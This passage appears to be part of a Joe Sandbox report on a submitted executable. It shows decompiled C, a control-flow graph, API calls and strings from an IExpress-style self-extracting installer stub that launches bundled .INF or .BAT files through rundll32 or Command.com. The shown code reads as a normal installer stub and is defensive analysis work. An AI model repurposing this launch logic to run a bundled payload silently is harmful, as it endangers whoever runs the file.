                                                                                                                                                                                                                                            control_flow_graph 141 8d1ae8-8d1b2c call 8d1680 144 8d1b2e-8d1b39 141->144 145 8d1b3b-8d1b40 141->145 146 8d1b46-8d1b61 call 8d1a84 144->146 145->146 149 8d1b9f-8d1bc2 call 8d1781 call 8d658a 146->149 150 8d1b63-8d1b65 146->150 159 8d1bc7-8d1bd3 call 8d66c8 149->159 151 8d1b68-8d1b6d 150->151 151->151 153 8d1b6f-8d1b74 151->153 153->149 155 8d1b76-8d1b7b 153->155 157 8d1b7d-8d1b81 155->157 158 8d1b83-8d1b86 155->158 157->158 160 8d1b8c-8d1b9d call 8d1680 157->160 158->149 161 8d1b88-8d1b8a 158->161 165 8d1bd9-8d1bf1 CompareStringA 159->165 166 8d1d73-8d1d7f call 8d66c8 159->166 160->159 161->149 161->160 165->166 168 8d1bf7-8d1c07 GetFileAttributesA 165->168 174 8d1df8-8d1e09 LocalAlloc 166->174 175 8d1d81-8d1d99 CompareStringA 166->175 170 8d1c0d-8d1c15 168->170 171 8d1d53-8d1d5e 168->171 170->171 173 8d1c1b-8d1c33 call 8d1a84 170->173 176 8d1d64-8d1d6e call 8d44b9 171->176 189 8d1c35-8d1c38 173->189 190 8d1c50-8d1c61 LocalAlloc 173->190 179 8d1e0b-8d1e1b GetFileAttributesA 174->179 180 8d1dd4-8d1ddf 174->180 175->174 178 8d1d9b-8d1da2 175->178 188 8d1e94-8d1ea4 call 8d6ce0 176->188 186 8d1da5-8d1daa 178->186 182 8d1e1d-8d1e1f 179->182 183 8d1e67-8d1e73 call 8d1680 179->183 180->176 182->183 187 8d1e21-8d1e3e call 8d1781 182->187 199 8d1e78-8d1e84 call 8d2aac 183->199 186->186 191 8d1dac-8d1db4 186->191 187->199 207 8d1e40-8d1e43 187->207 195 8d1c3a 189->195 196 8d1c40-8d1c4b call 8d1a84 189->196 190->180 198 8d1c67-8d1c72 190->198 197 8d1db7-8d1dbc 191->197 195->196 196->190 197->197 203 8d1dbe-8d1dd2 LocalAlloc 197->203 204 8d1c79-8d1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->204 205 8d1c74 198->205 211 8d1e89-8d1e92 199->211 203->180 208 8d1de1-8d1df3 call 8d171e 203->208 209 8d1cf8-8d1d07 204->209 210 8d1cc2-8d1ccc 204->210 205->204 207->199 212 8d1e45-8d1e65 call 8d16b3 * 2 207->212 208->211 213 8d1d09-8d1d21 GetShortPathNameA 209->213 214 8d1d23 209->214 216 8d1cce 210->216 217 8d1cd3-8d1cf3 call 8d1680 * 2 210->217 211->188 212->199 220 8d1d28-8d1d2b 213->220 214->220 216->217 217->211 224 8d1d2d 220->224 225 8d1d32-8d1d4e call 8d171e 220->225 224->225 225->211
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E008D1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v527;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				char _v1552;
                                                                                                                                                                                                                                            				CHAR* _v1556;
                                                                                                                                                                                                                                            				int* _v1560;
                                                                                                                                                                                                                                            				CHAR** _v1564;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                            				CHAR* _t53;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				CHAR* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				signed char _t65;
                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                                                                                            				CHAR* _t90;
                                                                                                                                                                                                                                            				CHAR* _t92;
                                                                                                                                                                                                                                            				char _t105;
                                                                                                                                                                                                                                            				char _t106;
                                                                                                                                                                                                                                            				CHAR** _t111;
                                                                                                                                                                                                                                            				CHAR* _t115;
                                                                                                                                                                                                                                            				intOrPtr* _t125;
                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                            				CHAR* _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				intOrPtr* _t146;
                                                                                                                                                                                                                                            				char* _t148;
                                                                                                                                                                                                                                            				CHAR* _t151;
                                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                                            				CHAR* _t155;
                                                                                                                                                                                                                                            				CHAR* _t156;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t48 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                            				_t108 = __ecx;
                                                                                                                                                                                                                                            				_v1564 = _a4;
                                                                                                                                                                                                                                            				_v1560 = _a8;
                                                                                                                                                                                                                                            				E008D1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                            				if(_v528 != 0x22) {
                                                                                                                                                                                                                                            					_t135 = " ";
                                                                                                                                                                                                                                            					_t53 =  &_v528;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t135 = "\"";
                                                                                                                                                                                                                                            					_t53 =  &_v527;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t111 =  &_v1556;
                                                                                                                                                                                                                                            				_v1556 = _t53;
                                                                                                                                                                                                                                            				_t54 = E008D1A84(_t111, _t135);
                                                                                                                                                                                                                                            				_t156 = _v1556;
                                                                                                                                                                                                                                            				_t151 = _t54;
                                                                                                                                                                                                                                            				if(_t156 == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_push(_t111);
                                                                                                                                                                                                                                            					E008D1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            					E008D658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t132 = _t156;
                                                                                                                                                                                                                                            					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t105 =  *_t132;
                                                                                                                                                                                                                                            						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                            					} while (_t105 != 0);
                                                                                                                                                                                                                                            					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                            					if(_t111 < 3) {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t106 = _t156[1];
                                                                                                                                                                                                                                            					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                            						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						E008D1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t138 = 0x2e;
                                                                                                                                                                                                                                            						_t57 = E008D66C8(_t156, _t138);
                                                                                                                                                                                                                                            						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            							_t139 = 0x2e;
                                                                                                                                                                                                                                            							_t115 = _t156;
                                                                                                                                                                                                                                            							_t58 = E008D66C8(_t115, _t139);
                                                                                                                                                                                                                                            							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									goto L43;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                            								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            									E008D1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_push(_t115);
                                                                                                                                                                                                                                            									_t108 = 0x400;
                                                                                                                                                                                                                                            									E008D1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                            									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                            										E008D16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                            										E008D16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = _t156;
                                                                                                                                                                                                                                            								 *_t156 = 0;
                                                                                                                                                                                                                                            								E008D2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                            								goto L53;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t145 = _t125 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t76 =  *_t125;
                                                                                                                                                                                                                                            									_t125 = _t125 + 1;
                                                                                                                                                                                                                                            								} while (_t76 != 0);
                                                                                                                                                                                                                                            								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                            								_t146 =  &_v268;
                                                                                                                                                                                                                                            								_t157 = _t146 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t77 =  *_t146;
                                                                                                                                                                                                                                            									_t146 = _t146 + 1;
                                                                                                                                                                                                                                            								} while (_t77 != 0);
                                                                                                                                                                                                                                            								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                            								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                            								if(_t156 != 0) {
                                                                                                                                                                                                                                            									E008D171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                            									goto L53;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L43;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t140 = 0x525;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t60 =  &_v268;
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t140 = "[";
                                                                                                                                                                                                                                            								_v1556 = _t151;
                                                                                                                                                                                                                                            								_t90 = E008D1A84( &_v1556, "[");
                                                                                                                                                                                                                                            								if(_t90 != 0) {
                                                                                                                                                                                                                                            									if( *_t90 != 0) {
                                                                                                                                                                                                                                            										_v1556 = _t90;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "]";
                                                                                                                                                                                                                                            									E008D1A84( &_v1556, "]");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									L43:
                                                                                                                                                                                                                                            									_t60 = 0;
                                                                                                                                                                                                                                            									_t140 = 0x4b5;
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									_push(0x10);
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									L35:
                                                                                                                                                                                                                                            									_push(_t60);
                                                                                                                                                                                                                                            									E008D44B9(0, _t140);
                                                                                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                                                                                            									goto L54;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t155 = _v1556;
                                                                                                                                                                                                                                            									_t92 = _t155;
                                                                                                                                                                                                                                            									if( *_t155 == 0) {
                                                                                                                                                                                                                                            										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									 *0x8d9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                            									 *_v1560 = 1;
                                                                                                                                                                                                                                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x8d1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                            										 *0x8d9a34 =  *0x8d9a34 & 0xfffffffb;
                                                                                                                                                                                                                                            										if( *0x8d9a40 != 0) {
                                                                                                                                                                                                                                            											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t108 = "setupx.dll";
                                                                                                                                                                                                                                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_push( &_v268);
                                                                                                                                                                                                                                            										_push(_t155);
                                                                                                                                                                                                                                            										E008D171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										 *0x8d9a34 =  *0x8d9a34 | 0x00000004;
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										E008D1680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                            										_t140 = 0x200;
                                                                                                                                                                                                                                            										E008D1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L53:
                                                                                                                                                                                                                                            									_t62 = 1;
                                                                                                                                                                                                                                            									 *_v1564 = _t156;
                                                                                                                                                                                                                                            									L54:
                                                                                                                                                                                                                                            									_pop(_t152);
                                                                                                                                                                                                                                            									return E008D6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}














































                                                                                                                                                                                                                                            0x008d1af3
                                                                                                                                                                                                                                            0x008d1afa
                                                                                                                                                                                                                                            0x008d1b07
                                                                                                                                                                                                                                            0x008d1b09
                                                                                                                                                                                                                                            0x008d1b1a
                                                                                                                                                                                                                                            0x008d1b20
                                                                                                                                                                                                                                            0x008d1b2c
                                                                                                                                                                                                                                            0x008d1b3b
                                                                                                                                                                                                                                            0x008d1b40
                                                                                                                                                                                                                                            0x008d1b2e
                                                                                                                                                                                                                                            0x008d1b2e
                                                                                                                                                                                                                                            0x008d1b33
                                                                                                                                                                                                                                            0x008d1b33
                                                                                                                                                                                                                                            0x008d1b46
                                                                                                                                                                                                                                            0x008d1b4c
                                                                                                                                                                                                                                            0x008d1b52
                                                                                                                                                                                                                                            0x008d1b57
                                                                                                                                                                                                                                            0x008d1b5d
                                                                                                                                                                                                                                            0x008d1b61
                                                                                                                                                                                                                                            0x008d1b9f
                                                                                                                                                                                                                                            0x008d1b9f
                                                                                                                                                                                                                                            0x008d1bb1
                                                                                                                                                                                                                                            0x008d1bc2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1b63
                                                                                                                                                                                                                                            0x008d1b63
                                                                                                                                                                                                                                            0x008d1b65
                                                                                                                                                                                                                                            0x008d1b68
                                                                                                                                                                                                                                            0x008d1b68
                                                                                                                                                                                                                                            0x008d1b6a
                                                                                                                                                                                                                                            0x008d1b6b
                                                                                                                                                                                                                                            0x008d1b6f
                                                                                                                                                                                                                                            0x008d1b74
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1b76
                                                                                                                                                                                                                                            0x008d1b7b
                                                                                                                                                                                                                                            0x008d1b86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1b8c
                                                                                                                                                                                                                                            0x008d1b8c
                                                                                                                                                                                                                                            0x008d1b98
                                                                                                                                                                                                                                            0x008d1bc7
                                                                                                                                                                                                                                            0x008d1bc9
                                                                                                                                                                                                                                            0x008d1bcc
                                                                                                                                                                                                                                            0x008d1bd3
                                                                                                                                                                                                                                            0x008d1d75
                                                                                                                                                                                                                                            0x008d1d76
                                                                                                                                                                                                                                            0x008d1d78
                                                                                                                                                                                                                                            0x008d1d7f
                                                                                                                                                                                                                                            0x008d1e05
                                                                                                                                                                                                                                            0x008d1e09
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1e12
                                                                                                                                                                                                                                            0x008d1e1b
                                                                                                                                                                                                                                            0x008d1e73
                                                                                                                                                                                                                                            0x008d1e21
                                                                                                                                                                                                                                            0x008d1e21
                                                                                                                                                                                                                                            0x008d1e28
                                                                                                                                                                                                                                            0x008d1e37
                                                                                                                                                                                                                                            0x008d1e3e
                                                                                                                                                                                                                                            0x008d1e52
                                                                                                                                                                                                                                            0x008d1e60
                                                                                                                                                                                                                                            0x008d1e60
                                                                                                                                                                                                                                            0x008d1e3e
                                                                                                                                                                                                                                            0x008d1e79
                                                                                                                                                                                                                                            0x008d1e7b
                                                                                                                                                                                                                                            0x008d1e84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1d9b
                                                                                                                                                                                                                                            0x008d1d9b
                                                                                                                                                                                                                                            0x008d1da0
                                                                                                                                                                                                                                            0x008d1da2
                                                                                                                                                                                                                                            0x008d1da5
                                                                                                                                                                                                                                            0x008d1da5
                                                                                                                                                                                                                                            0x008d1da7
                                                                                                                                                                                                                                            0x008d1da8
                                                                                                                                                                                                                                            0x008d1dac
                                                                                                                                                                                                                                            0x008d1dae
                                                                                                                                                                                                                                            0x008d1db4
                                                                                                                                                                                                                                            0x008d1db7
                                                                                                                                                                                                                                            0x008d1db7
                                                                                                                                                                                                                                            0x008d1db9
                                                                                                                                                                                                                                            0x008d1dba
                                                                                                                                                                                                                                            0x008d1dbe
                                                                                                                                                                                                                                            0x008d1dc3
                                                                                                                                                                                                                                            0x008d1dce
                                                                                                                                                                                                                                            0x008d1dd2
                                                                                                                                                                                                                                            0x008d1deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1dd2
                                                                                                                                                                                                                                            0x008d1bf7
                                                                                                                                                                                                                                            0x008d1bfe
                                                                                                                                                                                                                                            0x008d1c07
                                                                                                                                                                                                                                            0x008d1d55
                                                                                                                                                                                                                                            0x008d1d5a
                                                                                                                                                                                                                                            0x008d1d5b
                                                                                                                                                                                                                                            0x008d1d5d
                                                                                                                                                                                                                                            0x008d1d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1c1b
                                                                                                                                                                                                                                            0x008d1c1b
                                                                                                                                                                                                                                            0x008d1c20
                                                                                                                                                                                                                                            0x008d1c2c
                                                                                                                                                                                                                                            0x008d1c33
                                                                                                                                                                                                                                            0x008d1c38
                                                                                                                                                                                                                                            0x008d1c3a
                                                                                                                                                                                                                                            0x008d1c3a
                                                                                                                                                                                                                                            0x008d1c40
                                                                                                                                                                                                                                            0x008d1c4b
                                                                                                                                                                                                                                            0x008d1c4b
                                                                                                                                                                                                                                            0x008d1c5d
                                                                                                                                                                                                                                            0x008d1c61
                                                                                                                                                                                                                                            0x008d1dd4
                                                                                                                                                                                                                                            0x008d1dd4
                                                                                                                                                                                                                                            0x008d1dd6
                                                                                                                                                                                                                                            0x008d1ddb
                                                                                                                                                                                                                                            0x008d1ddc
                                                                                                                                                                                                                                            0x008d1dde
                                                                                                                                                                                                                                            0x008d1d64
                                                                                                                                                                                                                                            0x008d1d64
                                                                                                                                                                                                                                            0x008d1d67
                                                                                                                                                                                                                                            0x008d1d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d1c67
                                                                                                                                                                                                                                            0x008d1c67
                                                                                                                                                                                                                                            0x008d1c6d
                                                                                                                                                                                                                                            0x008d1c72
                                                                                                                                                                                                                                            0x008d1c74
                                                                                                                                                                                                                                            0x008d1c74
                                                                                                                                                                                                                                            0x008d1c8e
                                                                                                                                                                                                                                            0x008d1c99
                                                                                                                                                                                                                                            0x008d1cc0
                                                                                                                                                                                                                                            0x008d1cf8
                                                                                                                                                                                                                                            0x008d1d07
                                                                                                                                                                                                                                            0x008d1d23
                                                                                                                                                                                                                                            0x008d1d09
                                                                                                                                                                                                                                            0x008d1d14
                                                                                                                                                                                                                                            0x008d1d1b
                                                                                                                                                                                                                                            0x008d1d1b
                                                                                                                                                                                                                                            0x008d1d2b
                                                                                                                                                                                                                                            0x008d1d2d
                                                                                                                                                                                                                                            0x008d1d2d
                                                                                                                                                                                                                                            0x008d1d38
                                                                                                                                                                                                                                            0x008d1d39
                                                                                                                                                                                                                                            0x008d1d46
                                                                                                                                                                                                                                            0x008d1cc2
                                                                                                                                                                                                                                            0x008d1cc2
                                                                                                                                                                                                                                            0x008d1ccc
                                                                                                                                                                                                                                            0x008d1cce
                                                                                                                                                                                                                                            0x008d1cce
                                                                                                                                                                                                                                            0x008d1cdb
                                                                                                                                                                                                                                            0x008d1ce6
                                                                                                                                                                                                                                            0x008d1cee
                                                                                                                                                                                                                                            0x008d1cee
                                                                                                                                                                                                                                            0x008d1e89
                                                                                                                                                                                                                                            0x008d1e91
                                                                                                                                                                                                                                            0x008d1e92
                                                                                                                                                                                                                                            0x008d1e94
                                                                                                                                                                                                                                            0x008d1e97
                                                                                                                                                                                                                                            0x008d1ea4
                                                                                                                                                                                                                                            0x008d1ea4
                                                                                                                                                                                                                                            0x008d1c61
                                                                                                                                                                                                                                            0x008d1c07
                                                                                                                                                                                                                                            0x008d1bd3
                                                                                                                                                                                                                                            0x008d1b7b

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 008D1BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 008D1BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 008D1C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 008D1C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,008D1140,00000000,00000008,?), ref: 008D1CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 008D1D1B
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-2280873615
                                                                                                                                                                                                                                            • Opcode ID: 7b02f32fd526cb996a0215bb57fa6a9c2711700c2384d317c0de21fc14fa4bdf
                                                                                                                                                                                                                                            • Instruction ID: e2d255f38df7a0b5d917ddcad6d7bd8306ede9f5a042d011fee1bd83e20ef551
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b02f32fd526cb996a0215bb57fa6a9c2711700c2384d317c0de21fc14fa4bdf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADA1E270A00218BBEF209B28DC48BEA776AFF55320F144397E555E33D1DBB49E898B51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 324 8d597d-8d59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 8d59dd-8d5a1b GetDiskFreeSpaceA 324->325 326 8d59bb-8d59d8 call 8d44b9 call 8d6285 324->326 328 8d5ba1-8d5bde memset call 8d6285 GetLastError FormatMessageA 325->328 329 8d5a21-8d5a4a MulDiv 325->329 341 8d5c05-8d5c14 call 8d6ce0 326->341 338 8d5be3-8d5bfc call 8d44b9 SetCurrentDirectoryA 328->338 329->328 332 8d5a50-8d5a6c GetVolumeInformationA 329->332 335 8d5a6e-8d5ab0 memset call 8d6285 GetLastError FormatMessageA 332->335 336 8d5ab5-8d5aca SetCurrentDirectoryA 332->336 335->338 340 8d5acc-8d5ad1 336->340 352 8d5c02 338->352 344 8d5ad3-8d5ad8 340->344 345 8d5ae2-8d5ae4 340->345 344->345 347 8d5ada-8d5ae0 344->347 349 8d5ae7-8d5af8 345->349 350 8d5ae6 345->350 347->340 347->345 351 8d5af9-8d5afb 349->351 350->349 354 8d5afd-8d5b03 351->354 355 8d5b05-8d5b08 351->355 356 8d5c04 352->356 354->351 354->355 357 8d5b0a-8d5b1b call 8d44b9 355->357 358 8d5b20-8d5b27 355->358 356->341 357->352 360 8d5b29-8d5b33 358->360 361 8d5b52-8d5b5b 358->361 360->361 363 8d5b35-8d5b50 360->363 364 8d5b62-8d5b6d 361->364 363->364 365 8d5b6f-8d5b74 364->365 366 8d5b76-8d5b7d 364->366 367 8d5b85 365->367 368 8d5b7f-8d5b81 366->368 369 8d5b83 366->369 370 8d5b87-8d5b94 call 8d268b 367->370 371 8d5b96-8d5b9f 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E008D597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                            				unsigned int _t103;
                                                                                                                                                                                                                                            				unsigned int _t105;
                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                            				long _t112;
                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                                                                                            
